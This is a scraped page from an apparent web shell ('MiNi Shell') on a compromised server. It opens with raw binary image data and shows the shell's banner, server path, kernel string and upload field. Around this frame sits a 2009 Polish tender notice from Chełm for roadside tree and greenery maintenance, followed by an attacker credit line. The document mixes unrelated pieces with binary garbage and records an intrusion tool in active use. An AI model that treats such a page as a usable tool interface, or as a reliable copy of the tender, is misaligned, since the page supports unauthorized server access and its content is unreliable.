JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27253-N-2009.html

<p class="kh_header"><b>Chełm: Utrzymanie zadrzewienia i zieleni w pasach drogowych ulic na terenie miasta Chełm.</b><br>
<b>Numer ogłoszenia: 27253 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich , ul. Chełmońskiego 1, 22-100 Chełm, woj. lubelskie, tel. 082 5633228, faks 082 5633839.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdm-chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Miejska jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zadrzewienia i zieleni w pasach drogowych ulic na terenie miasta Chełm..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie zadrzewienia i zieleni w pasach drogowych ulic na terenie miasta Chełm, polegające na:

- utrzymaniu zadrzewienia i zieleni w pasach drogowych ulic krajowych, wojewódzkich i powiatowych - zadanie nr 1, 
- utrzymaniu zadrzewienia i zieleni w pasach drogowych ulic gminnych i dróg wewnętrznych - zadanie nr 2

Szczegółowy zakres zamówienia określono w załączniku nr 8 i załączniku nr 9 do specyfikacji istotnych warunków zamówienia - odpowiednio dla zadania nr 1 i zadania nr 2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w przypadku zadania nr 1, zadania nr 2:

1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:
a)	w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali:
- co najmniej jedną usługę polegającą na utrzymaniu zieleni w pasach drogowych ulic o wartości co najmniej 180 000,00 PLN, w przypadku zadania nr 1.
- co najmniej jedną usługę polegającą na utrzymaniu zieleni w pasach drogowych ulic o wartości co najmniej 84 000,00 PLN, w przypadku zadania nr 2.
b)	dysponują lub będą dysponować urządzeniami w asortymencie i ilości jednostek nie mniejszej niż wymienione w kolumnie 2 i 3 odpowiednio załącznika nr 4 (w przypadku zadania nr 1):
	- koparko - ładowarka - 1 szt.
	- podnośnik hydrauliczny - 1 szt.
	- samochód samowyładowczy 5 - 10 t - 1 szt.
	- kosiarka ciągnikowa - 1 szt.
	- kosiarka samobieżna - 2 szt.
	- kosa ręczna spalinowa - 2 szt.
	- ciągnik rolniczy z przyczepą - 2 szt. 
	- pilarka spalinowa do drewna - 1 szt. 
	- zamiatarka mechaniczna - 1 szt. 
oraz załącznika nr 5 do SIWZ (w przypadku zadania nr 2):
	- koparko - ładowarka - 1 szt.
	- podnośnik hydrauliczny - 1 szt.
	- kosiarka ciągnikowa - 1 szt.
	- kosiarka samobieżna - 1 szt.
	- kosa ręczna spalinowa - 2 szt.
	- ciągnik rolniczy z przyczepą - 1 szt. 
	- pilarka spalinowa do drewna - 1 szt. 
	- zamiatarka mechaniczna - 1 szt. 
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Wykonawcą może być osoba fizyczna, osoba prawna albo jednostka organizacyjna nieposiadająca osobowości prawnej, która będzie ubiegała się o udzielenie zamówienia publicznego, złoży ofertę lub zawrze umowę w sprawie zamówienia publicznego, jeżeli jego oferta zostanie wybrana.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. 
Warunki jakie muszą spełniać Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawia załącznik nr 2 do specyfikacji istotnych warunków zamówienia.

Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego będzie dokonana na podstawie treści wymaganych oświadczeń i dokumentów, o których mowa  w pkt. A. VI specyfikacji istotnych warunków zamówienia, według formuły  spełnia/nie spełnia  wymagany warunek..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W przypadku zadania nr 1 oraz zadania nr 2 Wykonawca zobowiązany jest złożyć wraz z ofertą nw. oświadczenie i dokumenty:

1.	Oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu, złożone na druku stanowiącym załącznik nr 3 do specyfikacji istotnych warunków zamówienia - odpowiednio dla zadania nr 1 i zadania nr 2;
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji  działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3.	Aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); 
4. Wykaz niezbędnych do wykonania zamówienia urządzeń, którymi dysponuje lub będzie dysponował Wykonawca, złożony odpowiednio na druku stanowiącym załącznik nr 4 i załącznik nr 5 do SIWZ, w asortymencie i ilości jednostek  nie mniejszej niż wymienione w kolumnie 2 i 3 odpowiednio załącznika nr 4 (zadanie nr 1), załącznika nr 5 do SIWZ (zadanie nr 2).
5. Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia urządzeń, jeżeli w wykazie, o którym mowa w pkt. 4 ogłoszenia Wykonawca wskazał urządzenia, którymi będzie dysponował.
6. Wykaz  wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, złożony odpowiednio na druku stanowiącym załącznik nr 6 (zadanie nr 1) do SIWZ i załącznik nr 7 (zadanie nr 2) do SIWZ. 
    Wykonawca powinien wykazać i udokumentować  wykonanie co najmniej jednej usługi, polegającej na utrzymaniu zieleni w pasach drogowych ulic o wartości co najmniej  180 000,00 PLN, w przypadku zadania nr 1,  co najmniej jednej usługi, polegającej na utrzymaniu zieleni w pasach drogowych ulic o wartości co najmniej  84 000,00 PLN, w przypadku zadania nr 2.
    Do każdej usługi umieszczonej w wykazie należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje, protokoły odbioru lub inne posiadane przez Wykonawcę dokumenty).  

Postanowienia §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.) stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdm-chelm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich, 22 - 100 Chełm, ul. Chełmońskiego 1, pok. nr 16.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 09:30, miejsce: siedziba Zamawiającego (Zarząd Dróg Miejskich, 22 - 100 Chełm, ul. Chełmońskiego 1, pokój nr 20) lub za pośrednictwem poczty.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie zadrzewienia i zieleni w pasach drogowych ulic krajowych,  wojewódzkich i powiatowych miasta Chełm - zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Utrzymanie zadrzewienia i zieleni w pasach drogowych ulic krajowych, wojewódzkich 
i powiatowych miasta Chełm.

Do obowiązków Wykonawcy należy:

1)	Sporządzenie projektu organizacji ruchu na czas prowadzenia prac w pasie drogowym i jej wprowadzenie w trakcie realizacji zamówienia.
Wykonawca ponosi pełną odpowiedzialność za oznakowanie i zabezpieczenie usług wykonywanych w pasie drogowym pod ruchem. Oznakowanie drogi, pojazdów, maszyn i urządzeń w miejscach wykonywanych usług winno być wykonane z należytą starannością i zgodne z projektem opracowanym staraniem Wykonawcy. 
2)	Uporządkowanie terenu po zakończeniu realizacji zleceń, łącznie z zamiataniem jezdni  i chodników. 
Wszelkie prace porządkowe należy wykonywać mechanicznie lub ręcznie na bieżąco, w dniu, w którym usługa była realizowana. Wytworzone odpady należy usunąć na koszt własny. Ustalenie miejsca wywozu odpadów powstających w wyniku realizacji zlecenia (np. skoszona trawa, liście, drobne gałęzie, karpina i inne) należy do Wykonawcy, który zobowiązany jest do przestrzegania warunków ochrony środowiska i ustawy o odpadach. Zamawiający zastrzega sobie prawo kontroli miejsca składowania odpadów. 
W przypadku nie wykonania czynności porządkowych w dniu, w którym zlecenie Zamawiającego było realizowane, Zamawiający zastrzega sobie prawo do wykonania ww. czynności porządkowych w trybie interwencyjnym i obciążenia Wykonawcy kosztami tych prac.
3)	Wyłączenie zasilania linii napowietrznej. 
Wykonawca we własnym zakresie i na koszt własny dokona zgłoszenia zamiaru prowadzenia robót w Zakładzie Energetycznym, dopełni wszelkich powinności i formalności związanych z wyłączeniem prądu na czas wycinki drzew, wykonywanych cięć gałęzi lub wiązań w koronie lub pniu drzewa oraz wszystkich innych prac wykonywanych w sąsiedztwie napowietrznych linii energetycznych.
4)	Prowadzenie prac z należytą starannością, zgodnie ze sztuką ogrodniczą i przepisami prawa oraz z uzgodnieniami dokonywanymi w trakcie realizacji tych prac. 
5)	Wykonywanie wszelkich zabiegów z zastosowaniem oprysków - zgodnie z ustaleniami Wojewódzkiej Inspekcji Kwarantanny i Ochrony Roślin po dopełnieniu formalności wynikających z właściwych przepisów. Wszelkie koszty towarzyszące związane z m.in. akcją informacyjną, dokonywaniem stosownych uzgodnień oraz wykonywaniem oprysków obciążają Wykonawcę.
6)	Używanie materiałów posiadających odpowiednie atesty lub normy. Wykonawca zobowiązany jest do okazywania  na żądanie Zamawiającego, w stosunku do wskazanych materiałów, certyfikatów na znak bezpieczeństwa lub deklaracji zgodności  z właściwą normą.
7)	Wywiezienie materiału pozyskanego z wycinki drzew na odległość do 10 km w miejsce wskazane przez Zamawiającego (baza ZDM) lub inne uzgodnione z Zamawiającym. Wywóz drewna (dłużyc) obejmuje jego obróbkę (pocięcie na odcinki dogodne do załadunku w miejscu wykonywania robót), załadunek materiału, jego rozładunek i ułożenie w stosy .
8)	Ubezpieczenie przedmiotowych robót, przy czym ubezpieczeniu podlegać będzie w szczególności odpowiedzialność cywilna za szkody oraz następstwa powstałe z winy Wykonawcy i jego pracowników w trakcie prowadzenia robót oraz w następstwie nieszczęśliwych wypadków, dotyczących pracowników Wykonawcy i osób trzecich, powstałe w związku z prowadzonymi pracami, w tym także z ruchem pojazdów mechanicznych.
9)	Zamawiający zobowiązuje Wykonawcę do należytej organizacji wykonywanych prac, w celu zmniejszenia uciążliwości dla użytkowników dróg i mieszkańców oraz do minimalizacji utrudnień z tytułu prowadzonych prac.
10)	Wszystkie prace stanowiące przedmiot zamówienia należy prowadzić z zachowaniem wszystkich wymogów z zakresu BHP i w sposób gwarantujący należyte wykonanie prac..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie zadrzewienia i zieleni w pasach drogowych ulic gminnych i dróg wewnętrznych miasta Chełm - zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Utrzymanie zadrzewienia i zieleni w pasach drogowych ulic gminnych i dróg wewnętrznych miasta Chełm.

Do obowiązków Wykonawcy należy:

1)	Sporządzenie projektu organizacji ruchu na czas prowadzenia prac w pasie drogowym i jej wprowadzenie w trakcie realizacji zamówienia.
Wykonawca ponosi pełną odpowiedzialność za oznakowanie i zabezpieczenie usług wykonywanych w pasie drogowym pod ruchem. Oznakowanie drogi, pojazdów, maszyn i urządzeń w miejscach wykonywanych usług winno być wykonane z należytą starannością i zgodne z projektem opracowanym staraniem Wykonawcy. 
2)	Uporządkowanie terenu po zakończeniu realizacji zleceń, łącznie z zamiataniem jezdni  i chodników. 
Wszelkie prace porządkowe należy wykonywać mechanicznie lub ręcznie na bieżąco, w dniu, w którym usługa była realizowana. Wytworzone odpady należy usunąć na koszt własny. Ustalenie miejsca wywozu odpadów powstających w wyniku realizacji zlecenia (np. skoszona trawa, liście, drobne gałęzie, karpina i inne) należy do Wykonawcy, który zobowiązany jest do przestrzegania warunków ochrony środowiska i ustawy o odpadach. Zamawiający zastrzega sobie prawo kontroli miejsca składowania odpadów. 
W przypadku nie wykonania czynności porządkowych w dniu, w którym zlecenie Zamawiającego było realizowane, Zamawiający zastrzega sobie prawo do wykonania ww. czynności porządkowych w trybie interwencyjnym i obciążenia Wykonawcy kosztami tych prac.
3)	Wyłączenie zasilania linii napowietrznej. 
Wykonawca we własnym zakresie i na koszt własny dokona zgłoszenia zamiaru prowadzenia robót w Zakładzie Energetycznym, dopełni wszelkich powinności i formalności związanych z wyłączeniem prądu na czas wycinki drzew, wykonywanych cięć gałęzi lub wiązań w koronie lub pniu drzewa oraz wszystkich innych prac wykonywanych w sąsiedztwie napowietrznych linii energetycznych.
4)	Prowadzenie prac z należytą starannością, zgodnie ze sztuką ogrodniczą i przepisami prawa oraz z uzgodnieniami dokonywanymi w trakcie realizacji tych prac. 
5)	Wykonywanie wszelkich zabiegów z zastosowaniem oprysków - zgodnie z ustaleniami Wojewódzkiej Inspekcji Kwarantanny i Ochrony Roślin po dopełnieniu formalności wynikających z właściwych przepisów. Wszelkie koszty towarzyszące związane z m.in. akcją informacyjną, dokonywaniem stosownych uzgodnień oraz wykonywaniem oprysków obciążają Wykonawcę.
6)	Używanie materiałów posiadających odpowiednie atesty lub normy. Wykonawca zobowiązany jest do okazywania  na żądanie Zamawiającego, w stosunku do wskazanych materiałów, certyfikatów na znak bezpieczeństwa lub deklaracji zgodności  z właściwą normą.
7)	Wywiezienie materiału pozyskanego z wycinki drzew na odległość do 10 km w miejsce wskazane przez Zamawiającego (baza ZDM) lub inne uzgodnione z Zamawiającym. Wywóz drewna (dłużyc) obejmuje jego obróbkę (pocięcie na odcinki dogodne do załadunku w miejscu wykonywania robót), załadunek materiału, jego rozładunek i ułożenie w stosy .
8)	Ubezpieczenie przedmiotowych robót, przy czym ubezpieczeniu podlegać będzie w szczególności odpowiedzialność cywilna za szkody oraz następstwa powstałe z winy Wykonawcy i jego pracowników w trakcie prowadzenia robót oraz w następstwie nieszczęśliwych wypadków, dotyczących pracowników Wykonawcy i osób trzecich, powstałe w związku z prowadzonymi pracami, w tym także z ruchem pojazdów mechanicznych.
9)	Zamawiający zobowiązuje Wykonawcę do należytej organizacji wykonywanych prac, w celu zmniejszenia uciążliwości dla użytkowników dróg i mieszkańców oraz do minimalizacji utrudnień z tytułu prowadzonych prac.
10)	Wszystkie prace stanowiące przedmiot zamówienia należy prowadzić z zachowaniem wszystkich wymogów z zakresu BHP i w sposób gwarantujący należyte wykonanie prac..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com